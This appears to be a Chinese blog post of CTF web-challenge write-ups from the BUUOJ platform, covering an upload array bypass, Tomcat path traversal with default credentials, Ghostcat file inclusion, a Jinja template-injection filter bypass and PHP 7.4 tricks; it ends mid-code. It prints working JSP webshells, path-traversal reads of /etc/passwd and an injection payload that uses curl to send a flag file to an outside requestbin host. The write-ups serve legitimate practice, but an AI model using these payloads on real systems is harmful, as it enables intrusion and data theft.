<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>BUUOJ-web刷题（四）</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <link href="https://fonts.googleapis.com/css?family=Noto+Sans+SC&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/gh/tonsky/FiraCode@2/distr/fira_code.css" rel="stylesheet">
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/04/03/D%E7%9B%BE%E5%85%8D%E6%9D%80PHPWebshell%E6%80%BB%E7%BB%93/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/03/31/MRCTF%E5%A4%8D%E7%9B%98%E9%A2%98%E8%A7%A3/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/&title=BUUOJ-web刷题（四）" target="_blank" rel="noopener"><i class="fab fa-qq " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://service.weibo.com/share/share.php?url=http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/&title=BUUOJ-web刷题（四）" target="_blank" rel="noopener"><i class="fab fa-weibo " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/&text=BUUOJ-web刷题（四）" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=BUUOJ-web刷题（四）&body=Check out this article: http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-01-PWNHUB-公开赛-2018-傻-fufu-的工作日"><span class="toc-number">1.</span> <span class="toc-text">0x 01 [PWNHUB 公开赛 2018]傻 fufu 的工作日</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-02-WUSTCTF2020-Train-Yourself-To-Be-Godly"><span class="toc-number">2.</span> <span class="toc-text">0x 02 [WUSTCTF2020]Train Yourself To Be Godly</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-03-WUSTCTF2020-easyweb"><span class="toc-number">3.</span> <span class="toc-text">0x 03 [WUSTCTF2020]easyweb</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-04-GWCTF-2019-你的名字"><span class="toc-number">4.</span> <span class="toc-text">0x 04 [GWCTF 2019]你的名字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-05-RCTF-2019-Nextphp"><span class="toc-number">5.</span> <span class="toc-text">0x 05 [RCTF 2019]Nextphp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-06-SCTF2019-Flag-Shop"><span class="toc-number">6.</span> <span class="toc-text">0x 06 [SCTF2019]Flag Shop</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-07-NESTCTF-2019-Love-Math-2"><span class="toc-number">7.</span> <span class="toc-text">0x 07 [NESTCTF 2019]Love Math 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-08-Zer0pts2020-Can-you-guess-it"><span class="toc-number">8.</span> <span class="toc-text">0x 08 [Zer0pts2020]Can you guess it?</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-09-Zer0pts2020-musicblog"><span class="toc-number">9.</span> <span class="toc-text">0x 09 [Zer0pts2020]musicblog</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-10-安洵杯-2019-cssgame"><span class="toc-number">10.</span> <span class="toc-text">0x 10 [安洵杯 2019]cssgame</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        BUUOJ-web刷题（四）
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-04-01T14:00:37.000Z" itemprop="datePublished">2020-04-01</time>
        
        (Updated: <time datetime="2020-04-21T14:58:02.736Z" itemprop="dateModified">2020-04-21</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/ctfwp/">ctfwp</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/BUUOJ/" rel="tag">BUUOJ</a>, <a class="tag-link" href="/tags/web/" rel="tag">web</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="0x-01-PWNHUB-公开赛-2018-傻-fufu-的工作日"><a href="#0x-01-PWNHUB-公开赛-2018-傻-fufu-的工作日" class="headerlink" title="0x 01 [PWNHUB 公开赛 2018]傻 fufu 的工作日"></a>0x 01 [PWNHUB 公开赛 2018]傻 fufu 的工作日</h3><ul>
<li><p>考点</p>
<p>php数组特性</p>
</li>
<li><p>解题步骤</p>
</li>
</ul>
<ol>
<li>题目存在源代码泄露，下载UploadFile.class.php.bak,发现使用的是PHP免扩展加密根据这篇文章介绍<a href="https://blog.csdn.net/ababab12345/article/details/90169678，使用解密工具解密，分析源代码定位到关键部分如下：" target="_blank" rel="noopener">https://blog.csdn.net/ababab12345/article/details/90169678，使用解密工具解密，分析源代码定位到关键部分如下：</a></li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">if(!in_array($filename[count($filename)-1], $this-&gt;allow_ext)) &#123;</span><br><span class="line">        return $this-&gt;error(&#39;只允许上传图片文件&#39;);</span><br><span class="line">&#125;</span><br><span class="line">....</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 用.分割文件名，只保留首尾两个字符串，防御Apache解析漏洞</span><br><span class="line">$origin_name &#x3D; current($filename);   &#x2F;&#x2F;返回数组中的当前单元</span><br><span class="line">$ext &#x3D; end($filename);  &#x2F;&#x2F;将数组内部指针指向最后一个元素，并返回该元素的值（如果成功）。</span><br><span class="line">$new_name &#x3D; ($this-&gt;new_name ? $this-&gt;new_name : $origin_name) . &#39;.&#39; . $ext;</span><br><span class="line">$target_fullpath &#x3D; $this-&gt;dist_path . DIRECTORY_SEPARATOR . $new_name;</span><br></pre></td></tr></table></figure>

<p>判断后缀名是否在白名单中使用了<code>$filename[count($filename) - 1]</code>，而最后字符合成文件名的时候使用了<code>end($filename)</code>。两者的区别是，前者是通过下标来确定，后者则是返回数组的最后一个元素。可以通过数组绕过：</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200401221558883.png" alt></p>
<p>在跟目录得到flag</p>
<h3 id="0x-02-WUSTCTF2020-Train-Yourself-To-Be-Godly"><a href="#0x-02-WUSTCTF2020-Train-Yourself-To-Be-Godly" class="headerlink" title="0x 02 [WUSTCTF2020]Train Yourself To Be Godly"></a>0x 02 [WUSTCTF2020]Train Yourself To Be Godly</h3><ul>
<li><p>考点</p>
<p>tomcat解析漏洞</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<p>补充知识：apache中的tomcat/webapps目录如下</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/GnhzdO.png" alt></p>
<p>manage目录是可以上传WAR文件部署服务，也就是说可以通过manage目录实现文件上传，继而实现木马上传</p>
<p>URL路径参数不规范引发的问题:</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/Gn4FSA.png" alt></p>
<p><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf" target="_blank" rel="noopener">https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf</a></p>
<p>文章告诉我们可以通过 /..;/manager/html 进入到manager页面</p>
<ol>
<li>随便加一串路径，根据报错信息得知当前的tomcat的root路径为examlpes</li>
</ol>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200403204510802.png" alt></p>
<ol start="2">
<li>访问<code>/..;/manager/html</code>目录穿越到 manager 需要输入密码验证，这里是弱密码 tomcat/tomcat</li>
</ol>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200403204629584.png" alt></p>
<p>接下来是后台getshell过程，webshell构造如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">    if(&quot;023&quot;.equals(request.getParameter(&quot;pwd&quot;)))&#123;</span><br><span class="line">        java.io.InputStream in &#x3D; Runtime.getRuntime().exec(request.getParameter(&quot;i&quot;)).getInputStream();</span><br><span class="line">        int a &#x3D; -1;</span><br><span class="line">        byte[] b &#x3D; new byte[2048];</span><br><span class="line">        out.print(&quot;&lt;pre&gt;&quot;);</span><br><span class="line">        while((a&#x3D;in.read(b))!&#x3D;-1)&#123;</span><br><span class="line">            out.println(new String(b));</span><br><span class="line">        &#125;</span><br><span class="line">        out.print(&quot;&lt;&#x2F;pre&gt;&quot;);</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>用<code>jar cvf lxj.war webshell.jsp</code>命令将webshell.jsp打包成war,然后上传文件，发现回显404，根据报错信息明显路径拼结完是example/manager/html/upload，缺少一个/..;/，加一个再试。接着会发现401，未授权访问。是缺少了header里的认证，当然在成功访问后台时抓包也能看到自己的header中有认证头。<br> <code>Authorization: Basic dG9tY2F0OnRvbWNhdA==</code>后面就是tomcat:tomcat的base64编码。继续上传，发现403。一般问题就出在cookie或者session没给，www没有目录访问权限身上。按照目前的思路来说，不会出现服务器权限不足的问题，那就只能是cookie没添。利用burpsuit从头开始抓包，在访问/..;/manager/html出现了Set-Cookie(set-Cookie的Path是指此cookie只在Path目录下起作用)，那么我们403的问题就迎刃而解，只需要将/example换成Path参数指定的/manage就行，再把cookie加上就完事了。</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200403205226924.png" alt></p>
<p>最后访问webshell，得到flag</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200403205311373.png" alt></p>
<p>参考资料：</p>
<blockquote>
<p><a href="https://www.52hertz.tech/2020/03/30/wctf2020_official_wp/#train-yourself-to-be-godly-1-solves" target="_blank" rel="noopener">https://www.52hertz.tech/2020/03/30/wctf2020_official_wp/#train-yourself-to-be-godly-1-solves</a></p>
<p><a href="https://www.jianshu.com/p/368d6c41a2f6" target="_blank" rel="noopener">https://www.jianshu.com/p/368d6c41a2f6</a></p>
</blockquote>
<h3 id="0x-03-WUSTCTF2020-easyweb"><a href="#0x-03-WUSTCTF2020-easyweb" class="headerlink" title="0x 03 [WUSTCTF2020]easyweb"></a>0x 03 [WUSTCTF2020]easyweb</h3><ul>
<li><p>考点</p>
<p>CVE-2020-1938幽灵猫文件包含</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>题目打开是一个文件上传，传一个文件上传上去会返回一个之前上传的文件下载，经过测试发现此处存在任意文件读取，可以随意下载：</li>
</ol>
<p>尝试WEB-INF下的web.xml:<code>/download?file=../web.xml</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version&#x3D;&quot;1.0&quot; encoding&#x3D;&quot;UTF-8&quot;?&gt;</span><br><span class="line">&lt;web-app xmlns&#x3D;&quot;http:&#x2F;&#x2F;xmlns.jcp.org&#x2F;xml&#x2F;ns&#x2F;javaee&quot;</span><br><span class="line">         xmlns:xsi&#x3D;&quot;http:&#x2F;&#x2F;www.w3.org&#x2F;2001&#x2F;XMLSchema-instance&quot;</span><br><span class="line">         xsi:schemaLocation&#x3D;&quot;http:&#x2F;&#x2F;xmlns.jcp.org&#x2F;xml&#x2F;ns&#x2F;javaee http:&#x2F;&#x2F;xmlns.jcp.org&#x2F;xml&#x2F;ns&#x2F;javaee&#x2F;web-app_4_0.xsd&quot;</span><br><span class="line">         version&#x3D;&quot;4.0&quot;&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    &lt;context-param&gt;</span><br><span class="line">        &lt;param-name&gt;webAppRootKey&lt;&#x2F;param-name&gt;</span><br><span class="line">        &lt;param-value&gt;tomcat.ajp&lt;&#x2F;param-value&gt;</span><br><span class="line">    &lt;&#x2F;context-param&gt;</span><br><span class="line"></span><br><span class="line">    &lt;listener&gt;</span><br><span class="line">        &lt;listener-class&gt;</span><br><span class="line">            org.springframework.web.util.WebAppRootListener</span><br><span class="line">        &lt;&#x2F;listener-class&gt;</span><br><span class="line">    &lt;&#x2F;listener&gt;</span><br><span class="line"></span><br><span class="line">    &lt;welcome-file-list&gt;</span><br><span class="line">        &lt;welcome-file&gt;&#x2F;WEB-INF&#x2F;views&#x2F;index.jsp&lt;&#x2F;welcome-file&gt;</span><br><span class="line">    &lt;&#x2F;welcome-file-list&gt;</span><br><span class="line"></span><br><span class="line">    &lt;error-page&gt;</span><br><span class="line">        &lt;exception-type&gt;java.lang.Throwable&lt;&#x2F;exception-type&gt;</span><br><span class="line">        &lt;location&gt;&#x2F;error&lt;&#x2F;location&gt;</span><br><span class="line">    &lt;&#x2F;error-page&gt;</span><br><span class="line">&lt;&#x2F;web-app&gt;</span><br></pre></td></tr></table></figure>

<p>尝试读取/etc/passwd:<code>/download?file=../../../../../../../etc/passwd</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:&#x2F;root:&#x2F;bin&#x2F;bash</span><br><span class="line">daemon:x:1:1:daemon:&#x2F;usr&#x2F;sbin:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">bin:x:2:2:bin:&#x2F;bin:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">sys:x:3:3:sys:&#x2F;dev:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">sync:x:4:65534:sync:&#x2F;bin:&#x2F;bin&#x2F;sync</span><br><span class="line">games:x:5:60:games:&#x2F;usr&#x2F;games:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">man:x:6:12:man:&#x2F;var&#x2F;cache&#x2F;man:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">lp:x:7:7:lp:&#x2F;var&#x2F;spool&#x2F;lpd:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">mail:x:8:8:mail:&#x2F;var&#x2F;mail:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">news:x:9:9:news:&#x2F;var&#x2F;spool&#x2F;news:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">uucp:x:10:10:uucp:&#x2F;var&#x2F;spool&#x2F;uucp:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">proxy:x:13:13:proxy:&#x2F;bin:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">www-data:x:33:33:www-data:&#x2F;var&#x2F;www:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">backup:x:34:34:backup:&#x2F;var&#x2F;backups:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:&#x2F;var&#x2F;list:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">irc:x:39:39:ircd:&#x2F;var&#x2F;run&#x2F;ircd:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):&#x2F;var&#x2F;lib&#x2F;gnats:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">nobody:x:65534:65534:nobody:&#x2F;nonexistent:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">_apt:x:100:65534::&#x2F;nonexistent:&#x2F;bin&#x2F;false</span><br><span class="line">messagebus:x:101:101::&#x2F;var&#x2F;run&#x2F;dbus:&#x2F;bin&#x2F;false</span><br><span class="line">sshd:x:102:65534::&#x2F;run&#x2F;sshd:&#x2F;usr&#x2F;sbin&#x2F;nologin</span><br><span class="line">systemd-timesync:x:103:104:systemd Time Synchronization,,,:&#x2F;run&#x2F;systemd:&#x2F;bin&#x2F;false</span><br><span class="line">systemd-network:x:104:105:systemd Network Management,,,:&#x2F;run&#x2F;systemd&#x2F;netif:&#x2F;bin&#x2F;false</span><br><span class="line">systemd-resolve:x:105:106:systemd Resolver,,,:&#x2F;run&#x2F;systemd&#x2F;resolve:&#x2F;bin&#x2F;false</span><br><span class="line">systemd-bus-proxy:x:106:107:systemd Bus Proxy,,,:&#x2F;run&#x2F;systemd:&#x2F;bin&#x2F;false</span><br></pre></td></tr></table></figure>

<p>使用CVE-2020-1938exp（<a href="https://github.com/00theway/Ghostcat-CNVD-2020-10487/blob/master/ajpShooter.py）尝试进行文件读取。成功获取页面" target="_blank" rel="noopener">https://github.com/00theway/Ghostcat-CNVD-2020-10487/blob/master/ajpShooter.py）尝试进行文件读取。成功获取页面</a></p>
<blockquote>
<p>注意由于靶机在内网，所以IP地址是根据Lan Domain确定的，外网IP是内网穿透绑定的</p>
</blockquote>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200403221242014.png" alt></p>
<p>构造exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page import&#x3D;&quot;java.util.*,java.io.*&quot;%&gt;</span><br><span class="line">&lt;% </span><br><span class="line">out.println(&quot;Executing command&quot;);</span><br><span class="line">Process p &#x3D; Runtime.getRuntime().exec(&quot;ls &#x2F;&quot;);</span><br><span class="line">OutputStream os &#x3D; p.getOutputStream();</span><br><span class="line">InputStream in &#x3D; p.getInputStream();</span><br><span class="line">DataInputStream dis &#x3D; new DataInputStream(in);</span><br><span class="line">String disr &#x3D; dis.readLine();</span><br><span class="line">while ( disr !&#x3D; null ) &#123;</span><br><span class="line">  out.println(disr); </span><br><span class="line">  disr &#x3D; dis.readLine(); </span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p>上传成功后利用文件包含执行木马，最后<code>cat /flag78bt787it8b9b098j0k80k0ggg</code>得到flag</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200403221421718.png" alt></p>
<p>参考资料：</p>
<blockquote>
<p><a href="https://www.gem-love.com/ctf/2176.html#easyweb" target="_blank" rel="noopener">https://www.gem-love.com/ctf/2176.html#easyweb</a></p>
<p><a href="https://www.52hertz.tech/2020/03/30/wctf2020_official_wp/#easyweb-23-solves" target="_blank" rel="noopener">https://www.52hertz.tech/2020/03/30/wctf2020_official_wp/#easyweb-23-solves</a></p>
</blockquote>
<h3 id="0x-04-GWCTF-2019-你的名字"><a href="#0x-04-GWCTF-2019-你的名字" class="headerlink" title="0x 04 [GWCTF 2019]你的名字"></a>0x 04 [GWCTF 2019]你的名字</h3><ul>
<li><p>考点</p>
<p>ssti bypass</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<p>经过fuzz,后台强过滤匹配<code></code>，这里可以用if语句绕过。黑名单过滤如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">blacklist &#x3D; [&#39;import&#39;, &#39;getattr&#39;, &#39;os&#39;, &#39;class&#39;, &#39;subclasses&#39;, &#39;mro&#39;, &#39;request&#39;, &#39;args&#39;, &#39;eval&#39;, &#39;if&#39;, &#39;for&#39;,</span><br><span class="line">                 &#39; subprocess&#39;, &#39;file&#39;, &#39;open&#39;, &#39;popen&#39;, &#39;builtins&#39;, &#39;compile&#39;, &#39;execfile&#39;, &#39;from_pyfile&#39;, &#39;local&#39;,</span><br><span class="line">                 &#39;self&#39;, &#39;item&#39;, &#39;getitem&#39;, &#39;getattribute&#39;, &#39;func_globals&#39;, &#39;config&#39;]</span><br><span class="line">for no in blacklist:</span><br><span class="line">    while True:</span><br><span class="line">        if no in s:</span><br><span class="line">            s &#x3D; s.replace(no, &#39;&#39;)</span><br><span class="line">        else:</span><br><span class="line">            break</span><br><span class="line">return s</span><br></pre></td></tr></table></figure>

<p>这个逻辑是按顺序针对每个关键词过滤，只能应付双写绕过，可以用列表的最后一项来绕过过滤,payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% iconfigf &#39;&#39;.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen(&#39;curl http:&#x2F;&#x2F;http.requconfigestbin.buuoj.cn&#x2F;1inhq4f1 -d &#96;cat &#x2F;flag_1s_Hera&#96;;&#39;) %&#125;1&#123;% endiconfigf %&#125;</span><br></pre></td></tr></table></figure>

<p>过滤之后最终的脚本如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% if &#39;&#39;.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen(&#39;curl http:&#x2F;&#x2F;http.requestbin.buuoj.cn&#x2F;1inhq4f1 -d &#96;cat &#x2F;flag_1s_Hera&#96;;&#39;) %&#125;1&#123;% endif %&#125;</span><br></pre></td></tr></table></figure>

<h3 id="0x-05-RCTF-2019-Nextphp"><a href="#0x-05-RCTF-2019-Nextphp" class="headerlink" title="0x 05 [RCTF 2019]Nextphp"></a>0x 05 [RCTF 2019]Nextphp</h3><ul>
<li><p>考点</p>
<p>php7.4新版本特性</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>查看php配置信息，版本是7.4，同时发现过滤了大多数系统函数</li>
</ol>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200414224651185.png" alt></p>
<ol start="2">
<li>没有过滤scandir函数，payload:<code>?a=var_dump(scandir(&#39;/var/www/html&#39;));</code></li>
</ol>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200414224810734.png" alt></p>
<ol start="3">
<li>利用file_get_contents()查看preload.php源码，payload：<code>a=echo file_get_contents(&#39;preload.php&#39;);</code></li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">final class A implements Serializable &#123;</span><br><span class="line">    protected $data &#x3D; [</span><br><span class="line">        &#39;ret&#39; &#x3D;&gt; null,</span><br><span class="line">        &#39;func&#39; &#x3D;&gt; &#39;print_r&#39;,</span><br><span class="line">        &#39;arg&#39; &#x3D;&gt; &#39;1&#39;</span><br><span class="line">    ];</span><br><span class="line"></span><br><span class="line">    private function run () &#123;</span><br><span class="line">        $this-&gt;data[&#39;ret&#39;] &#x3D; $this-&gt;data[&#39;func&#39;]($this-&gt;data[&#39;arg&#39;]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __serialize(): array &#123;</span><br><span class="line">        return $this-&gt;data;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __unserialize(array $data) &#123;</span><br><span class="line">        array_merge($this-&gt;data, $data);</span><br><span class="line">        